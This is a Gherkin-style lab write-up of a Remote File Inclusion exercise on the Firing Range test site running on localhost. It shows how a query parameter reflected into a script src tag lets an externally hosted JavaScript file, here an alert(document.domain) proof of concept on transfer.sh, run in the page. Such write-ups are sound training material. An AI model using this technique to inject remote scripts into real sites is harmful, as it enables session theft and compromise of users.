# language: en

Feature: Remote File Inclusion
  From Firing Range System

  Background:
    Given I'm running Windows 10 Enterprise 1803 (17134.228)
    And also using Firefox version 61.0.2
    Given the following
    """
    URL: http://localhost:8080/remoteinclude/parameter/script?q=
    Message: Remote File Inclusion
    Details:
        - Include a javascript file
        - Run an alert with the domain name
    Objective: Perform a Remote File Inclusion
    """

  Scenario: Remote File Inclusion
    Given the inital site
    Then I inspect the page source code
    """
    <body>
      <script src="test"></script>
    </body>
    """
    Then I add the word 'test' in the URL
    """
    URL: http://localhost:8080/remoteinclude/parameter/script?q=test
    Result:
    <body>
      <script src="test"></script>
    </body>
    """
    Then I create a simple js file with alert(document.domain);
    And I load this file in https://transfer.sh
    And I add the file in the URL
    """
    URL: ../remoteinclude/parameter/script?q=https://transfer.sh/roW8U/remote.js
    Result: alert with localhost
    """
    Then The vulnerability is verified